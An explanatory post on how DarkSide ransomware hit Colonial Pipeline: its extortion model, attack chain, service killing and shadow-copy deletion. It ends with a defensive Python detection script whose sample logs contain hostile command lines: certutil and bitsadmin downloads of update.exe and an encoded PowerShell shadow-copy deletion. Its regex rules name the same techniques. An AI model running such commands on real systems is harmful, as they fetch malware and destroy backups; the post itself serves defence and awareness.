DarkSide ransomware on the Colonial Pipeline network
We all know about the recent ransomware attack on Colonial Pipeline. Let us try to understand what exactly happened.

About the firm: Colonial Pipeline is the largest refined-products pipeline in the US, transporting over 100 million gallons of fuel across its corridors.

The recent ransomware attack against Colonial Pipeline's networks led to an emergency declaration in 17 states and the District of Columbia, across 5,500 miles of fuel pipeline.
Let's understand DarkSide ransomware

DarkSide is a relatively new ransomware strain that made its first appearance in August 2020. It follows the RaaS (ransomware-as-a-service) model.

It follows the double-extortion trend:
1. Threat actors encrypt the victim's data.
2. They exfiltrate the data and threaten to make it public if the ransom demand is not paid.

Their ransom demands range from $200,000 to $2,000,000.
Let's now understand the attack vector:
1. Downloading the ransomware: it is designed to start only after an initial foothold in the network has been gained.
2. The attackers use PowerShell to download the DarkSide binary as "update.exe" using the "download file" command, abusing certutil.exe and bitsadmin.exe in the process.
3. The DarkSide binary is downloaded into the C:\Windows and temporary directories; a shared folder is also created on the infected machine, and PowerShell is used to download a copy of the malware there.
4. After initial access, the attacker then moves laterally, with the main goal of taking over the domain controller (DC).
5. Once domain access is obtained, user hashes are dumped.
6. The attackers use PowerShell to download the DarkSide binary from the shared folder created on the initial system (patient zero).
7. A shared folder using the company's name is created on the DC and the DarkSide binary is copied into it.
8. After data exfiltration, the attackers use bitsadmin.exe to distribute the ransomware binary from the shared folder to systems.
Mode of infection of the ransomware:
1. After execution on the initial host, it checks the system language using the GetSystemDefaultUILanguage() and GetUserDefaultLangID() functions, so that systems located in former Soviet-bloc countries are not encrypted.
2. Certain services related to security and backup solutions are then stopped, including:
   · Vs
   · sql
   · svc
   · memtas
   · Mepocs
   · sophos
   · veeam
   · backup
3. A C2 (command and control) connection is established; across the different samples analyzed, the attackers use the IPs programmed into the binary.
4. After deleting the Volume Shadow Copy Service (VSS), the ransomware deletes the shadow copies using an obfuscated PowerShell script that uses WMI.
5. Running processes are enumerated; the common goal is both to steal the related information stored in the files and to encrypt them.
6. DarkSide creates a unique user_id string for the victim and appends it to the encrypted files' extension as <file_name>.{userid}. In addition, the malware changes the icons of the encrypted files and changes the desktop background.
7. Finally, it leaves a ransom note, "readme.{userid}.txt".
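As an added defender-side example (not code from this post), the following Python script turns the indicators from the two lists above (certutil/bitsadmin downloads of update.exe, WMI shadow-copy deletion hidden in encoded PowerShell, the <file_name>.{userid} extension and the readme.{userid}.txt note) into simple detection rules run over constructed sample telemetry. The "kind|host|detail" log format, the host names and the 8-hex-character length of user_id are assumptions.

```python
import base64
import re

# Process-creation rules drawn from the attack chain in the post (certutil/bitsadmin
# downloads, WMI shadow-copy deletion), applied after decoding any -EncodedCommand.
PROCESS_RULES = [
    ("certutil_download", re.compile(r"certutil(\.exe)?\s.*-urlcache.*\.exe", re.I)),
    ("bitsadmin_transfer", re.compile(r"bitsadmin(\.exe)?\s+/transfer", re.I)),
    ("wmi_shadowcopy_delete", re.compile(r"win32_shadowcopy.*delete", re.I)),
]
# File naming from the post; the 8-hex user_id length is an assumption, not from the post.
USERID = r"[0-9a-f]{8}"
ENCRYPTED_FILE = re.compile(rf"\.{USERID}$", re.I)
RANSOM_NOTE = re.compile(rf"(^|\\)readme\.{USERID}\.txt$", re.I)
ENC_FLAG = re.compile(r"-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

def decode_powershell(cmdline):
    """Append the plaintext of a PowerShell -EncodedCommand (base64 of UTF-16LE)."""
    m = ENC_FLAG.search(cmdline)
    try:
        return cmdline + " " + base64.b64decode(m.group(1)).decode("utf-16le") if m else cmdline
    except (ValueError, UnicodeDecodeError):
        return cmdline  # malformed payload: keep the raw command line

def classify(kind, detail):
    """Rule names that fire for one record; kind is 'proc' (command line) or 'file' (path)."""
    if kind == "proc":
        text = decode_powershell(detail)
        return [name for name, rx in PROCESS_RULES if rx.search(text)]
    if RANSOM_NOTE.search(detail):
        return ["darkside_ransom_note"]
    return ["darkside_encrypted_file"] if ENCRYPTED_FILE.search(detail) else []

def scan(log_text):
    """Map host -> sorted rule names, showing which stage of the chain each host reached."""
    findings = {}
    for line in log_text.strip().splitlines():
        kind, host, detail = line.split("|", 2)
        for name in classify(kind, detail):
            findings.setdefault(host, set()).add(name)
    return {h: sorted(v) for h, v in findings.items()}

# Constructed sample telemetry (not from the incident), one 'kind|host|detail' record per line.
ENC_SAMPLE = base64.b64encode("Get-WmiObject Win32_ShadowCopy | ForEach-Object {$_.Delete()}".encode("utf-16le")).decode()
SAMPLE_LOG = "\n".join([
    r"proc|ws01|certutil.exe -urlcache -split -f http://example.invalid/update.exe C:\Windows\Temp\update.exe",
    r"proc|ws01|bitsadmin.exe /transfer job1 http://example.invalid/update.exe C:\Windows\update.exe",
    f"proc|dc01|powershell.exe -nop -w hidden -enc {ENC_SAMPLE}",
    r"proc|ws02|svchost.exe -k netsvcs",
    r"file|ws02|C:\Users\alice\Documents\report.docx.a1b2c3d4",
    r"file|ws02|C:\Users\alice\Documents\readme.a1b2c3d4.txt",
])
```

Running scan(SAMPLE_LOG) groups the hits per host, so the staging host, the DC and the encrypted workstation each show the stage of the chain they are in; the 8-hex extension rule will also match unrelated files with such a suffix, so treat it as a triage signal rather than proof on its own.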